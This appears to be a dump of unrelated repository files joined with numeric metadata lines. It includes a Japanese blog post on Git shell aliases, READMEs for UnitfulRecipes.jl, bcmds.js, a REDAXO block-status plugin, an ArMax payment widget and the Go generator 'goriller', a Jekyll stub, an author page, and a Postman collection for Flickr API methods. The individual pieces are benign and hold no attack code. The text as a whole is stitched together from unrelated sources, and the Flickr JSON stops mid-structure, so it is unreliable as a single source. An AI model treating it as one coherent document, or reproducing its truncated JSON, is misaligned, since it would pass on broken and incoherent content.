--- title : 僕が登録している Git のエイリアス created : 2017-05-01 last-modified: 2017-05-01 header-date : true path: - /index.html Neo's World - /blog/index.html Blog - /blog/2017/index.html 2017年 - /blog/2017/05/index.html 05月 hidden-info: original-blog: Corredor --- 僕が登録している Git 関連のエイリアスを紹介する。 Git のエイリアスは `git config` コマンドを使うことで、「`git (エイリアス)`」という形で叩けるようになる。例えばこんな感じだ。 ```bash # 以下のようにエイリアスを設定する。 # 「--global」を付けると「~/.gitconfig」に設定が書き込まれる $ git config --global alias.st status # 以下で「git status」が呼べるようになる $ git st ``` これでも十分短いのだが、自分は `~/.bashrc` にエイリアスを直接登録して、以下のようなモノを用意している。 ```bash # ~/.bashrc # git branch alias gb='git branch' # リモートも表示する alias gba='git branch -a' # git status --short --branch の略。省略表記しつつブランチ名も確認できる alias gs='git status -sb' # 普通の git status alias gst='git status' # git add alias ga='git add' # 空コミット。大抵は初回コミットで使うので Init というエイリアスにしている。コメントは Vim で入れる alias ginit='git commit --allow-empty' # git commit。その場でコメントを打てるように -m オプション付き alias gc='git commit -m' # git log … シンプル表示・10件のみ表示 alias gl=' git log --date=short --pretty=format:"%C(Yellow)%h %C(Cyan)%cd %C(Reset)%s %C(Blue)[%cn]%C(Red)%d" -10' # git log … グラフ表示 alias glr='git log --date=short --pretty=format:"%C(Yellow)%h %C(Cyan)%cd %C(Reset)%s %C(Blue)[%cn]%C(Red)%d" --graph' # git log … 修正ライン数が分かる alias gll='git log --date=short --pretty=format:"%C(Yellow)%h %C(Cyan)%cd %C(Reset)%s %C(Blue)[%cn]%C(Red)%d" --numstat' # git pull alias gpl='git pull' # git push alias gps='git push' ``` こんな風にしているので、 - 何かファイルに変更を加えたら、まずはブランチの状況確認 : `gs` (`git status -sb`) - Add するファイルを指定 (例えば全ファイル Add する) : `ga .` (`git add .`) - コミットする : `gc "ほげほげを追加"` (`git commit -m "ほげほげを追加"`) - コミット内容を確認する : `glr` (`git log --graph`) - Push する : `gps` (`git push`) ってな感じで操作できる。大変便利。 他にもエイリアスにしたら良いコマンドはあるとは思うのだが、ぼくは_必ずしも使用頻度が高いコマンドを何でもエイリアス化しない方が良い_と思っている。特に Git の場合、一度 Push した履歴を Rebase して、改変した歴史を Push するような操作はチーム開発の迷惑になったりする。こういうある種「危険」なコマンドは、わざとタイプ数を多く保っておくことで、一つひとつの操作に注意するようになると考えているからだ。 上の例でも、`gpl` (`git pull`) と `gps` (`git push`) は、自分で決めたエイリアスであるにも関わらず、勢いで逆のコマンドを打ちかけることがあったりする。これぐらいならまだ誤って叩いてしまってもそこまで影響がないと思ってエイリアス化したものの、自分の不注意で何かやらかすことが多かったら、エイリアス化をやめようと思う。ご利用は計画的に、ということである。 - 参考:[よく使うgitコマンドのエイリアスを設定して開発効率をアップする - Qiita](http://qiita.com/unsoluble_sugar/items/ce14e9ce20aa5ba34fe5)
28.936709
210
0.718723
jpn_Jpan
0.402244
484cc92334b9b445830a8c7f37b9377c8f050eeb
1,386
md
Markdown
docs/src/index.md
DanDeepPhase/UnitfulRecipes.jl
ae159f3a6456a6f22721e2959bf0ac8a74e00f93
[ "MIT" ]
27
2019-08-29T08:33:53.000Z
2022-02-20T15:48:08.000Z
docs/src/index.md
DanDeepPhase/UnitfulRecipes.jl
ae159f3a6456a6f22721e2959bf0ac8a74e00f93
[ "MIT" ]
61
2019-08-29T08:45:39.000Z
2021-11-12T22:43:22.000Z
docs/src/index.md
DanDeepPhase/UnitfulRecipes.jl
ae159f3a6456a6f22721e2959bf0ac8a74e00f93
[ "MIT" ]
24
2019-09-04T05:17:50.000Z
2021-06-18T16:10:01.000Z
# UnitfulRecipes.jl *for plotting data with units seamlessly in Julia* [UnitfulRecipes.jl](https://github.com/jw3126/UnitfulRecipes.jl) provides recipes for plotting figures ([Plots.jl](https://github.com/JuliaPlots/Plots.jl)) when using data with units ([Unitful.jl](https://github.com/PainterQubits/Unitful.jl)). --- ### Documentation There is no real documentation for [UnitfulRecipes.jl](https://github.com/jw3126/UnitfulRecipes.jl). The goal is that if you can plot something with [Plots.jl](https://github.com/JuliaPlots/Plots.jl) then you should be able to plot the same thing with units. Essentially, [UnitfulRecipes.jl](https://github.com/jw3126/UnitfulRecipes.jl) strips the units of your data and appends them to the corresponding axis labels. Pictures speak louder than words, so we wrote some examples (accessible through the links on the left) for you to get an idea of what this package does or to simply try it out for yourself! !!! note "You can run the examples!" These examples are available as Jupyter notebooks (through [nbviewer](https://nbviewer.jupyter.org/) or [binder](https://mybinder.org/))! --- ### Ommissions, bugs, and contributing Please do not hesitate to raise an [issue](https://github.com/jw3126/UnitfulRecipes.jl/issues) or submit a [PR](https://github.com/jw3126/UnitfulRecipes.jl/pulls) if you would like a new recipe to be added.
51.333333
243
0.764791
eng_Latn
0.948959
484da20bf5a3cb75ba142762d5cdcfbc9d44db5e
49
md
Markdown
README.md
apporoad/bcmds.js
8e233f2f1399498e2c42f4d9025e1dee33b3ff26
[ "MIT" ]
null
null
null
README.md
apporoad/bcmds.js
8e233f2f1399498e2c42f4d9025e1dee33b3ff26
[ "MIT" ]
null
null
null
README.md
apporoad/bcmds.js
8e233f2f1399498e2c42f4d9025e1dee33b3ff26
[ "MIT" ]
null
null
null
# bcmds.js big cmds, collecter for custom cmds
16.333333
37
0.734694
yue_Hant
0.377883
484e495be3b489336e48b70349c1180baccdfd13
1,632
md
Markdown
plugins/status/README.de.md
FriendsOfREDAXO/bloecks
36cb1c3734a7b5f9cfad37aaa2db07b6cf1f37b6
[ "MIT" ]
61
2016-08-03T15:40:19.000Z
2022-01-19T13:14:06.000Z
plugins/status/README.de.md
FriendsOfREDAXO/bloecks
36cb1c3734a7b5f9cfad37aaa2db07b6cf1f37b6
[ "MIT" ]
93
2016-08-03T15:28:03.000Z
2022-03-17T18:43:28.000Z
plugins/status/README.de.md
FriendsOfREDAXO/bloecks
36cb1c3734a7b5f9cfad37aaa2db07b6cf1f37b6
[ "MIT" ]
10
2016-08-23T17:01:36.000Z
2019-08-19T08:03:49.000Z
# Status Fügt Inhaltsmodulen einen Status `online` und `offline` hinzu, mit dem du sie auf deiner Website anzeigen oder verstecken kannst. Offline-Blöcke sind ausgegraut und zeigen eine Status-Markierung an. <img src="https://raw.githubusercontent.com/FriendsOfREDAXO/bloecks/assets/bloecks_status_01.png" alt="Screenshot" style="width: 100%; max-width: 1000px; margin: 20px 0;"> <br> ## Benutzung Klicke auf den Knopf mit dem __Auge-Symbol__ <img src="https://raw.githubusercontent.com/FriendsOfREDAXO/bloecks/assets/bloecks_status_eye_closed.png" alt="Auge geschlossen" style="width: 32px;">, um einen Block offline zu setzen. Er wird danach ausgegraut und zeigt eine Status-Markierung an. Ein erneuter Klick auf das Auge <img src="https://raw.githubusercontent.com/FriendsOfREDAXO/bloecks/assets/bloecks_status_eye_open.png" alt="Auge geöffnet" style="width: 32px;"> bringt den Block wieder online. ## Benutzerrechte Benutzer müssen entweder Administratoren sein oder über das Recht `bloecks[status]` (»Blöcke an/abschalten«) verfügen, um den Status eines Blocks ändern zu können. ## Status innerhalb eines Moduls ändern Beispiel-Code: ```php if (rex::isBackend()) { $slice_status = bloecks_status_backend::setSliceStatus("REX_SLICE_ID", 0); // status: true/false } ``` ## Extension Points | EP | Beschreibung | |-------------------------|----------------------------------| | `SLICE_UPDATE_STATUS` | Wird aufgerufen, bevor sich der Status eines Blocks ändert | | `SLICE_STATUS_UPDATED ` | Wird aufgerufen, nachdem der Status eines Blocks erfolgreich geändert wurde |
49.454545
503
0.726103
deu_Latn
0.93974
484e9d9d24c66e8b73ca38fcce5fd0be049fcd9d
2,872
md
Markdown
README.md
armax-ru/pay-widget-meta
fb145290c08bfa809b7f2d56c5230cff75972b56
[ "Apache-2.0" ]
1
2018-04-05T08:39:31.000Z
2018-04-05T08:39:31.000Z
README.md
armax-ru/pay-widget-meta
fb145290c08bfa809b7f2d56c5230cff75972b56
[ "Apache-2.0" ]
null
null
null
README.md
armax-ru/pay-widget-meta
fb145290c08bfa809b7f2d56c5230cff75972b56
[ "Apache-2.0" ]
null
null
null
# ArMax Pay Widget Виджет платежной формы для встраивания в веб-страницу. ## Поддержка Вопросы по работе и поддерже **сервисов ArMax** можно задать по адресу [support@armax.ru](mailto:support@armax.ru) Вопросы по настройке, работе и установке платежного виджета можно задать в [Issues](https://github.com/armax-ru/pay-widget-meta/issues) данного репозитория. ## Содержание * [Настройка веб-терминала](#Настройка-веб-терминала) * [Настройка способов оплаты](#Настройка-способов-оплаты) * [Интеграция в веб-страницу](#Интеграция-в-веб-страницу) * [Простая установка](#Простая-установка) * [Ручная инициализация](#Ручная-инициализация) ## Установка Для установки необходимо [создать и/или настроить](#Настройка-веб-терминала) терминал типа **"Web-терминал"** и подключить JS файл для отображения виджета. ### Настройка веб-терминала 1. В кабинете агента ArMax создать терминал типа **"Web-терминал"**. 2. Заполнить поля во вкладке **"Основные настройки"** 3. Во вкладке **"Профили"** настроить профили отоборажения и комиссии. #### Настройка способов оплаты Для настройки способов оплаты, в одноименной вкладке терминала типа **"Web-терминал"** необходино: 1. Создать новый ключ оплаты терминала (кнопка "Создать ключ") 2. Ввести название будущего ключа и выбрать платежную систему. 3. Настроить выбранную платежную систему На данный момент, для подключения в платежной форме доступны следующие способы оплаты: * [Яндекс.Касса](/payment-methods/yandex.md) * [Payler](/payment-methods/payler.md) * Uniteller ### Интеграция в веб-страницу Установить виджет на веб-страницу можно двумя способами - простой вставкой HTML кода или ручной инициализацией виджета. #### Простая установка Разместите данный код в нужном месте HTML страницы: ```html <script data-terminal-id="00000" type="text/javascript" src="https://payframe.armax.ru/widget/armax-pay-widget-loader.min.js" async> </script> ``` У созданного веб-терминала из пункта [Настройка веб-терминала](#Настройка-веб-терминала) определите ID терминала (колонка ID в общем списке терминалов или поле "Серийный номер" в настройках конкретного терминала). Замените `00000` в значении аттрибута `data-terminal-id` на ID терминала. Пример автоматической установки в [examples/auto-setup.html](/examples/auto-setup.html) #### Ручная инициализация Для инициализации виджета на странице необходимо подключить npm-пакет [`@armax-ru/pay-widget`](https://github.com/armax-ru/pay-widget) и вызвать функцию-конструктор `ArmaxPayWidget`: ```js new ArmaxPayWidget ({ container: document.getElementById('pay-widget-container'), terminalId: 00000 }); ``` Пример ручной инциализации виджета в [examples/manual-setup.html](/examples/manual-setup.html) Более подробную информацию по использованию этого метода можно найти в репозитории npm-пакета [`@armax-ru/pay-widget`](https://github.com/armax-ru/pay-widget)
43.515152
213
0.777159
rus_Cyrl
0.915849
484eeb7d9791b40a322c3e65ba44e03e61c00ce9
218
md
Markdown
_watches/M20200509_075735_TLP_1.md
Meteoros-Floripa/meteoros.floripa.br
7d296fb8d630a4e5fec9ab1a3fb6050420fc0dad
[ "MIT" ]
5
2020-05-19T17:04:49.000Z
2021-03-30T03:09:14.000Z
_watches/M20200509_075735_TLP_1.md
Meteoros-Floripa/site
764cf471d85a6b498873610e4f3b30efd1fd9fae
[ "MIT" ]
null
null
null
_watches/M20200509_075735_TLP_1.md
Meteoros-Floripa/site
764cf471d85a6b498873610e4f3b30efd1fd9fae
[ "MIT" ]
2
2020-05-19T17:06:27.000Z
2020-09-04T00:00:43.000Z
--- layout: watch title: TLP1 - 09/05/2020 - M20200509_075735_TLP_1T.jpg date: 2020-05-09 07:57:35 permalink: /2020/05/09/watch/M20200509_075735_TLP_1 capture: TLP1/2020/202005/20200508/M20200509_075735_TLP_1T.jpg ---
27.25
62
0.784404
eng_Latn
0.055902
484f3d2bfac304250f61a27ad8b51785e7f52bb6
382
md
Markdown
content/authors/yingqiao-wang/_index.md
ilonabass/cocodev.org
52c4b2e3118c2969cf330647b02fbe9d141f05d5
[ "MIT" ]
null
null
null
content/authors/yingqiao-wang/_index.md
ilonabass/cocodev.org
52c4b2e3118c2969cf330647b02fbe9d141f05d5
[ "MIT" ]
6
2020-09-09T02:44:50.000Z
2021-01-15T17:38:43.000Z
content/authors/yingqiao-wang/_index.md
ilonabass/cocodev.org
52c4b2e3118c2969cf330647b02fbe9d141f05d5
[ "MIT" ]
7
2020-08-12T05:36:34.000Z
2021-08-09T21:25:44.000Z
--- title: YingQiao Wang role: Undergraduate Student avatar_filename: img_0513-1-.jpg bio: I'm interested in utilizing the methods from mathematics, statistics, and computational modeling to investigate the topics in causal reasoning and intuitive physics. education: courses: - course: B.A. institution: Colby College user_groups: - Undergraduate Students --- TBD
25.466667
78
0.767016
eng_Latn
0.966259
48505504f94f39f03c6b6895c5cc4ddc6e93aa74
7,269
md
Markdown
README.md
mh-cbon/goriller
7fb2ab393957c85906ac15b75fc2fb59d903b871
[ "MIT" ]
3
2017-05-08T21:47:05.000Z
2019-07-14T20:13:58.000Z
README.md
mh-cbon/goriller
7fb2ab393957c85906ac15b75fc2fb59d903b871
[ "MIT" ]
null
null
null
README.md
mh-cbon/goriller
7fb2ab393957c85906ac15b75fc2fb59d903b871
[ "MIT" ]
null
null
null
# goriller [![travis Status](https://travis-ci.org/mh-cbon/goriller.svg?branch=master)](https://travis-ci.org/mh-cbon/goriller) [![Appveyor Status](https://ci.appveyor.com/api/projects/status/github/mh-cbon/goriller?branch=master&svg=true)](https://ci.appveyor.com/projects/mh-cbon/goriller) [![Go Report Card](https://goreportcard.com/badge/github.com/mh-cbon/goriller)](https://goreportcard.com/report/github.com/mh-cbon/goriller) [![GoDoc](https://godoc.org/github.com/mh-cbon/goriller?status.svg)](http://godoc.org/github.com/mh-cbon/goriller) [![MIT License](http://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) Package goriller generate gorilla routers. # TOC - [Install](#install) - [Usage](#usage) - [$ goriller -help](#-goriller--help) - [Cli examples](#cli-examples) - [API example](#api-example) - [Anootations](#anootations) - [> demo/main.go](#-demomaingo) - [> demo/controllergoriller.go](#-democontrollergorillergo) - [> demo/controllergorillerrpc.go](#-democontrollergorillerrpcgo) - [Recipes](#recipes) - [Release the project](#release-the-project) - [History](#history) # Install ```sh mkdir -p $GOPATH/src/github.com/mh-cbon/goriller cd $GOPATH/src/github.com/mh-cbon/goriller git clone https://github.com/mh-cbon/goriller.git . glide install go install ``` ## Usage #### $ goriller -help ```sh goriller 0.0.0 Usage goriller [-p name] [-mode name] [...types] types: A list of types such as src:dst. A type is defined by its package path and its type name, [pkgpath/]name If the Package path is empty, it is set to the package name being generated. Name can be a valid type identifier such as TypeName, *TypeName, []TypeName -p: The name of the package output. -mode: The generation mode std|rpc. ``` ## Cli examples ```sh # Create a goriller binder version of JSONTomates to HTTPTomates goriller *JSONTomates:HTTPTomates # Create a goriller binder version of JSONTomates to HTTPTomates to stdout goriller -p main - JSONTomates:HTTPTomates ``` # API example Following example demonstates a program using it to generate a goriller binder of a type. #### Anootations `goriller` reads and interprets annotations on `struct` and `methods`. The `struct` annotations are used as default for the `methods` annotations. | Name | Description | | --- | --- | | @route | The route path such as `/{param}` | | @name | The route name `name` | | @host | The route name `host` | | @methods | The route methods `GET,POST,PUT` | | @schemes | The route methods `http, https` | #### > demo/main.go ```go package main import ( "io" "log" "net/http" "os" "time" "github.com/gorilla/mux" httper "github.com/mh-cbon/httper/lib" ) //go:generate lister *Tomate:TomatesGen //go:generate channeler TomatesGen:TomatesSyncGen //go:generate jsoner -mode gorilla *Controller:ControllerJSONGen //go:generate httper -mode gorilla *ControllerJSONGen:ControllerHTTPGen //go:generate goriller *ControllerHTTPGen:ControllerGoriller //go:generate goriller -mode rpc *ControllerHTTPGen:ControllerGorillerRPC func main() { backend := NewTomatesSyncGen() backend.Push(&Tomate{Name: "Red"}) jsoner := NewControllerJSONGen(NewController(backend), nil) httper := NewControllerHTTPGen(jsoner, nil) router := mux.NewRouter() NewControllerGoriller(httper).Bind(router) http.Handle("/", router) go func() { log.Fatal(http.ListenAndServe(":8080", nil)) }() time.Sleep(1 * time.Millisecond) req, err := http.Get("http://localhost:8080/0") if err != nil { panic(err) } defer req.Body.Close() io.Copy(os.Stdout, req.Body) } // Tomate is about red vegetables to make famous italian food. type Tomate struct { ID int Name string } // GetID return the ID of the Tomate. func (t *Tomate) GetID() int { return t.ID } // Controller of some resources. type Controller struct { backend *TomatesSyncGen } // NewController ... func NewController(backend *TomatesSyncGen) *Controller { return &Controller{ backend: backend, } } // GetByID ... // @route /{id} // @methods GET func (t *Controller) GetByID(urlID int) *Tomate { return t.backend.Filter(FilterTomatesGen.ByID(urlID)).First() } // UpdateByID ... // @route /{id} // @methods PUT,POST func (t *Controller) UpdateByID(urlID int, reqBody *Tomate) *Tomate { var ret *Tomate t.backend.Filter(func(v *Tomate) bool { if v.ID == urlID { v.Name = reqBody.Name ret = v } return true }) return ret } // DeleteByID ... // @route /{id} // @methods DELETE func (t *Controller) DeleteByID(REQid int) bool { return t.backend.Remove(&Tomate{ID: REQid}) } // TestVars1 ... func (t *Controller) TestVars1(w http.ResponseWriter, r *http.Request) { } // TestCookier ... func (t *Controller) TestCookier(c httper.Cookier) { } // TestSessionner ... func (t *Controller) TestSessionner(s httper.Sessionner) { } // TestRPCer ... func (t *Controller) TestRPCer(id int) bool { return false } ``` Following code is the generated implementation of the goriller binder. #### > demo/controllergoriller.go ```go package main // file generated by // github.com/mh-cbon/goriller // do not edit import ( "github.com/gorilla/mux" ) // ControllerGoriller is a goriller of *ControllerHTTPGen. // ControllerHTTPGen is an httper of *ControllerJSONGen. // ControllerJSONGen is jsoner of *Controller. // Controller of some resources. type ControllerGoriller struct { embed *ControllerHTTPGen } // NewControllerGoriller constructs a goriller of *ControllerHTTPGen func NewControllerGoriller(embed *ControllerHTTPGen) *ControllerGoriller { ret := &ControllerGoriller{ embed: embed, } return ret } // Bind the given router. func (t ControllerGoriller) Bind(router *mux.Router) { router.HandleFunc("/{id}", t.embed.GetByID).Methods("GET") router.HandleFunc("/{id}", t.embed.UpdateByID).Methods("PUT", "POST") router.HandleFunc("/{id}", t.embed.DeleteByID).Methods("DELETE") } ``` Following code is the generated implementation of the goriller binder in an rpc fashion. #### > demo/controllergorillerrpc.go ```go package main // file generated by // github.com/mh-cbon/goriller // do not edit import ( "github.com/gorilla/mux" ) // ControllerGorillerRPC is a goriller of *ControllerHTTPGen. // ControllerHTTPGen is an httper of *ControllerJSONGen. // ControllerJSONGen is jsoner of *Controller. // Controller of some resources. type ControllerGorillerRPC struct { embed *ControllerHTTPGen } // NewControllerGorillerRPC constructs a goriller of *ControllerHTTPGen func NewControllerGorillerRPC(embed *ControllerHTTPGen) *ControllerGorillerRPC { ret := &ControllerGorillerRPC{ embed: embed, } return ret } // Bind the given router. func (t ControllerGorillerRPC) Bind(router *mux.Router) { router.HandleFunc("GetByID", t.embed.GetByID) router.HandleFunc("UpdateByID", t.embed.UpdateByID) router.HandleFunc("DeleteByID", t.embed.DeleteByID) router.HandleFunc("TestVars1", t.embed.TestVars1) router.HandleFunc("TestCookier", t.embed.TestCookier) router.HandleFunc("TestSessionner", t.embed.TestSessionner) router.HandleFunc("TestRPCer", t.embed.TestRPCer) } ``` # Recipes #### Release the project ```sh gump patch -d # check gump patch # bump ``` # History [CHANGELOG](CHANGELOG.md)
25.065517
614
0.719494
kor_Hang
0.336865
485085c4ad6d99aaaaffbae2f2a3b6cc3cf405d6
893
md
Markdown
README.md
onthehead/sketch-plugin-move-layers-to-adjacent-place
8f58eaec03dee96f6dc219211e9dbb7d3aba871c
[ "MIT" ]
1
2019-01-02T12:38:22.000Z
2019-01-02T12:38:22.000Z
README.md
onthehead/sketch-plugin-move-layers-to-adjacent-place
8f58eaec03dee96f6dc219211e9dbb7d3aba871c
[ "MIT" ]
null
null
null
README.md
onthehead/sketch-plugin-move-layers-to-adjacent-place
8f58eaec03dee96f6dc219211e9dbb7d3aba871c
[ "MIT" ]
null
null
null
# Move Layers to Adjacent Sketch Plugin <img src="https://github.com/onthehead/sketch-plugin-move-layers-to-adjacent-place/blob/master/img/fig-01.png" alt="Move Layers to Adjacent"/> This plugin move / duplicate layers to adjacent place (top / right / bottom / left). <img src="https://github.com/onthehead/sketch-plugin-move-layers-to-adjacent-place/blob/master/img/preview.gif" alt="Preview Move Layers to Adjacent"/> ## Function and Shortcut * Move Layers to Top: `⌃` + `↑` * Move Layers to Right: `⌃` + `→` * Move Layers to Bottom: `⌃` + `↓` * Move Layers to Left: `⌃` + `←` * Duplicate Layers to Top: `⌃` + `⌥` + `↑` * Duplicate Layers to Right: `⌃` + `⌥` + `→` * Duplicate Layers to Bottom: `⌃` + `⌥` + `↓` * Duplicate Layers to Left: `⌃` + `⌥` + `←` * Setting...: `⌃` + `,` ## Download * https://github.com/onthehead/sketch-plugin-move-layers-to-adjacent-place/archive/master.zip
38.826087
151
0.655095
eng_Latn
0.468104
48517be304bedabf797e06556d46175d723fc1b2
2,726
md
Markdown
docs-archive-a/2014/relational-databases/clr-integration/data-access/context-connections-vs-regular-connections.md
v-alji/sql-docs-archive-pr.es-es
410a49b0a08c22fd4bc973078b563238d69c8b44
[ "CC-BY-4.0", "MIT" ]
1
2021-11-25T21:09:51.000Z
2021-11-25T21:09:51.000Z
docs-archive-a/2014/relational-databases/clr-integration/data-access/context-connections-vs-regular-connections.md
v-alji/sql-docs-archive-pr.es-es
410a49b0a08c22fd4bc973078b563238d69c8b44
[ "CC-BY-4.0", "MIT" ]
1
2021-11-25T02:22:05.000Z
2021-11-25T02:27:15.000Z
docs-archive-a/2014/relational-databases/clr-integration/data-access/context-connections-vs-regular-connections.md
v-alji/sql-docs-archive-pr.es-es
410a49b0a08c22fd4bc973078b563238d69c8b44
[ "CC-BY-4.0", "MIT" ]
1
2021-09-29T08:53:04.000Z
2021-09-29T08:53:04.000Z
--- title: Conexiones regulares y de contexto | Microsoft Docs ms.custom: '' ms.date: 06/13/2017 ms.prod: sql-server-2014 ms.reviewer: '' ms.technology: clr ms.topic: reference helpviewer_keywords: - context connections [CLR integration] - regular connections [CLR integration] ms.assetid: a1dead02-be88-4b16-8cb2-db1284856764 author: rothja ms.author: jroth ms.openlocfilehash: ce531129099a8f4908bdc4b29920696d4ba3c505 ms.sourcegitcommit: ad4d92dce894592a259721a1571b1d8736abacdb ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 08/04/2020 ms.locfileid: "87677698" --- # <a name="regular-vs-context-connections"></a>Conexiones normales y conexiones de contexto Si se conecta a un servidor remoto, utilice siempre conexiones normales en lugar de conexiones de contexto. Si se debe conectar al mismo servidor donde se está ejecutando el procedimiento almacenado o la función, utilice la conexión de contexto en la mayoría de los casos. Entre las ventajas que esto presenta se encuentran la ejecución en el mismo espacio de la transacción y que no es necesario volver a autenticarse. Además, la utilización de la conexión de contexto suele proporciona un mejor rendimiento y menos uso de recursos. La conexión de contexto es una conexión solo en proceso, por lo que puede ponerse en contacto con el servidor "directamente" omitiendo el protocolo de red y los niveles de transporte para enviar instrucciones Transact-SQL y recibir resultados. También se omite el proceso de autenticación. En la figura siguiente se muestran los componentes principales del proveedor administrado de `SqlClient`, así como la forma en que interactúan los diferentes componentes entre sí al utilizar una conexión normal y al utilizar la conexión de contexto. ![Rutas de acceso al código de un contexto y una conexión normal.](../../../database-engine/dev-guide/media/clrintdataaccess.gif "Rutas de acceso al código de un contexto y una conexión normal.") La conexión de contexto sigue una ruta de acceso al código más corta e implica menos componentes, de modo que puede esperar que las solicitudes y los resultados se envíen al servidor y de éste más rápido que en una conexión normal. El tiempo de ejecución de consultas en el servidor es el mismo en las conexiones de contexto y normales. Hay algunos casos en los que puede necesitar abrir una conexión normal independiente al mismo servidor. Por ejemplo, hay ciertas restricciones en el uso de la conexión de contexto, descrita en [restricciones de las conexiones normales y de contexto](context-connections-and-regular-connections-restrictions.md). ## <a name="see-also"></a>Consulte también [Conexión de contexto](context-connection.md)
73.675676
656
0.797506
spa_Latn
0.995487
4851cb37b4bda48eee06571e1608b3ec4e875b41
1,025
md
Markdown
user/themes/giansi/_demo/07.components/04.dynamic/dynamic_components.md
bqevin/flavor-grav
4f44dad70e3ff6a33798b714647db56b5025ff39
[ "MIT" ]
null
null
null
user/themes/giansi/_demo/07.components/04.dynamic/dynamic_components.md
bqevin/flavor-grav
4f44dad70e3ff6a33798b714647db56b5025ff39
[ "MIT" ]
null
null
null
user/themes/giansi/_demo/07.components/04.dynamic/dynamic_components.md
bqevin/flavor-grav
4f44dad70e3ff6a33798b714647db56b5025ff39
[ "MIT" ]
null
null
null
--- title: Dynamic components metadata: description: Use available components rendering them by their templates when you need to represent dynamic data fetched from an external source. slug: dynamic-bootstrap-components-as-shortcodes-for-grav-cms highlight: theme: ir-black --- [g-jumbotron name="jumbotron1" fullwidth="true" image="bg.jpg" render=false] # Render components by templates You can use the available components rendering them by their templates when you need to represent dynamic data fetched from an external source, like a database or a json file. [Download Gravstrap Theme](https://github.com/giansi/gravstrap-theme-skeleton/releases){.btn .btn-outline-inverse .btn-lg} [Learn Gravstrap](http://diblas.net/plugins/use-bootstrap-components-as-shortcodes-in-grav-cms){.btn .btn-outline-inverse .btn-lg} [/g-jumbotron] # Bootstrap components dynamically rendered by template You can render the most of the Bootstrap components dynamically. Here you will find the example code for those components.
42.708333
175
0.792195
eng_Latn
0.955968
485378b8974b011dbf6cfa6de115d416288fc7a7
65,535
md
Markdown
_listings/flickr/restmethodflickr-urls-getgroup-get-postman.md
streamdata-gallery-organizations/flickr
332ec5089bf8a64a0ecc462d9a9254a82a9999ac
[ "CC-BY-3.0" ]
null
null
null
_listings/flickr/restmethodflickr-urls-getgroup-get-postman.md
streamdata-gallery-organizations/flickr
332ec5089bf8a64a0ecc462d9a9254a82a9999ac
[ "CC-BY-3.0" ]
null
null
null
_listings/flickr/restmethodflickr-urls-getgroup-get-postman.md
streamdata-gallery-organizations/flickr
332ec5089bf8a64a0ecc462d9a9254a82a9999ac
[ "CC-BY-3.0" ]
null
null
null
{ "info": { "name": "Flickr Urls Get Group", "_postman_id": "93253fda-74fe-4ce4-a2db-de7117f97f07", "description": "Returns the url to a group's page.", "schema": "https://schema.getpostman.com/json/collection/v2.0.0/" }, "item": [ { "name": "Upload", "item": [ { "id": "eb72c3ec-6194-4c28-88ab-3fa357268b89", "name": "postUpload", "request": { "url": "http://api.flickr.com/services/upload?async=%7B%7D&content_type=%7B%7D&description=%7B%7D&hidden=%7B%7D&is_family=%7B%7D&is_friend=%7B%7D&is_public=%7B%7D&safety_level=%7B%7D&tags=%7B%7D&title=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Uploads a photo. Uploading apps can call the flickr.people.getUploadStatus method in the regular API to obtain file and bandwidth limits for the user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "99c8e25e-1a88-4b8f-afda-8b1a29639067" } ] } ] }, { "name": "Replace", "item": [ { "id": "9d0365f6-8014-46a2-a1b5-a3845ce4c149", "name": "postReplace", "request": { "url": "http://api.flickr.com/services/replace?async=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Replaces a photo that has already been uploaded to Flickr. Uploading apps can call the flickr.people.getUploadStatus method in the regular API to obtain file and bandwidth limits for the user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "d189e265-3af1-4be1-9e61-0a690459ff5b" } ] } ] }, { "name": "Activity", "item": [ { "id": "08bd132d-16b7-4945-b444-6248d8b26954", "name": "getRestMethodFlickr.activity.usercomments", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.activity.userComments?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of recent activity on photos commented on by the calling user. Do not poll this method more than once an hour." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "c2b48977-64bf-4592-ae1e-9289d683f01b" } ] }, { "id": "e86aab6c-70c9-4718-b40c-a00913636f50", "name": "getRestMethodFlickr.activity.userphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.activity.userPhotos?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&timeframe=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of recent activity on photos commented on by the calling user. Do not poll this method more than once an hour." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "b8fdcf76-8acf-4eaa-bfb2-bb01732b3232" } ] } ] }, { "name": "Auth", "item": [ { "id": "d7a413f8-8eec-45e8-bdf7-6c657252bcaf", "name": "getRestMethodFlickr.auth.checktoken", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.auth.checkToken?api_key=%7B%7D&auth_token=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns the credentials attached to an authentication token. This call must be signed as specified in the authentication API spec." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "07cff905-6d1f-418e-b4c6-88f04feb29f3" } ] }, { "id": "2fae0d4c-1bd0-4ef7-a3c6-8d8579860f02", "name": "getRestMethodFlickr.auth.getfrob", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.auth.getFrob?api_key=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a frob to be used during authentication. This method call must be signed, and is deprecated in favour of OAuth." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "a66ee4e5-bc51-4156-803f-e4d0f56e6f56" } ] }, { "id": "b24be7da-7e23-42d6-94a5-406211648b3f", "name": "getRestMethodFlickr.auth.getfulltoken", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.auth.getFullToken?api_key=%7B%7D&format=%7B%7D&mini_token=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get the full authentication token for a mini-token. This method call must be signed." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "c0a9da24-46f0-48a5-a33f-4187c28598c1" } ] }, { "id": 